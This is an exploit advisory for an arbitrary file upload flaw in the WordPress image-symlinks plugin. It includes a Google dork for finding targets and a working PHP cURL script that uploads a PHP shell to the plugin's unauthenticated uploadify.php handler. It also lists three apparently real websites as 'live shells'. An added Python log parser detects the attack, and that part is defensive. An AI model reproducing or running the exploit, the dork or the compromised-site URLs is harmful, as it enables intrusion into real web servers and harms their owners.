
WordPress image-symlinks Plugin Arbitrary File Upload Vulnerability

Author: X-Bruno , Published: 24-06-2014
############################################################################

# Title : WordPress image-symlinks Plugin Arbitrary File Upload Vulnerability

# Author : X-Bruno

# Date : 24/06/2014

# Facebook : http://fb.me/Inj3ct.Bruno

# Email: brunox338@gmail.com

# Vendor : www.wordpress.org

# Google Dork : inurl:"/wp-content/plugins/image-symlinks/"

# Tested on : Windows 7 , Linux

######################################################################


==> Exploit Info :


The attacker can upload file/shell.php

("php") // Allowed file extensions



"/uploadify/"; // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)


==> Exploit :


<?php

$uploadfile = "Bruno.php";

$ch = curl_init("http://localhost/wordpress/wp-content/plugins/image-symlinks/uploadify/uploadify.php");

curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
    array(
        'Filedata' => "@$uploadfile",   // "@file" is the pre-PHP 5.5 cURL file-upload syntax
        'folder'   => '/wp-content/plugins/image-symlinks/uploadify/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

$postResult = curl_exec($ch);
curl_close($ch);

print "$postResult";

?>



Shell Access : http://localhost/wp-content/image-symlinks/uploadify/random_name.php


<?php phpinfo(); ?>
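Added detection example (not part of the original advisory): a small parser for combined-format web server access logs that flags the two events this advisory describes, a POST to the plugin's uploadify.php handler and a .php file later served out of the image-symlinks uploadify directory, and pairs them by client address. The log lines, IPs and file name are constructed samples; the endpoint and directory paths are the ones named on this page.

```python
import re
from collections import defaultdict

# Combined log format: ip ident user [ts] "METHOD path proto" status bytes ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Unauthenticated upload handler named in the advisory.
UPLOAD_ENDPOINT = "/wp-content/plugins/image-symlinks/uploadify/uploadify.php"
# Directory the handler writes into (advisory shows it under wp-content/ and
# wp-content/uploads/); a .php file served from there is the dropped shell.
SHELL_PATH_RE = re.compile(r"^/wp-content/(uploads/)?image-symlinks/uploadify/[^/?]+\.php(\?|$)")

# Constructed sample log; 203.0.113.x / 198.51.100.x are documentation ranges.
SAMPLE_LOG = """\
203.0.113.7 - - [24/Jun/2014:10:01:02 +0000] "POST /wp-content/plugins/image-symlinks/uploadify/uploadify.php HTTP/1.1" 200 152 "-" "curl/7.35.0"
203.0.113.7 - - [24/Jun/2014:10:01:05 +0000] "GET /wp-content/uploads/image-symlinks/uploadify/hun.php HTTP/1.1" 200 31337 "-" "curl/7.35.0"
198.51.100.9 - - [24/Jun/2014:10:02:00 +0000] "GET /wp-content/plugins/image-symlinks/uploadify/uploadify.css HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.9 - - [24/Jun/2014:10:02:01 +0000] "GET /wp-admin/ HTTP/1.1" 200 8192 "-" "Mozilla/5.0"
"""


def parse_line(line):
    """Return the fields of one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def detect_uploadify_abuse(log_text):
    """Map client IP -> list of (alert_kind, path) for upload-handler POSTs and
    for PHP files executed from the uploadify upload directory."""
    alerts = defaultdict(list)
    uploaded_from = set()
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        ip, method, path, status = rec["ip"], rec["method"], rec["path"], rec["status"]
        # The handler needs no authentication, so any POST to it is notable.
        if method == "POST" and path.split("?")[0] == UPLOAD_ENDPOINT:
            alerts[ip].append(("upload_post", path))
            uploaded_from.add(ip)
        # A successful request for a .php file in the upload dir is the shell.
        elif SHELL_PATH_RE.match(path) and status == "200":
            kind = "shell_exec_after_upload" if ip in uploaded_from else "shell_exec"
            alerts[ip].append((kind, path))
    return dict(alerts)


if __name__ == "__main__":
    for ip, hits in detect_uploadify_abuse(SAMPLE_LOG).items():
        print(ip, hits)
```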



====================================

Examples : ( Live Shells )

1 - http://www.scuboutique.com/wp-content/uploads/image-symlinks/uploadify/hun.php

2- http://datadriven.info/wp-content/uploads/image-symlinks/uploadify/hun.php


3- http://www.inlan.fr//wp-content/uploads/image-symlinks/uploadify/hun.php

# Greeting to : Syria , Palestine , HunTerS - Team
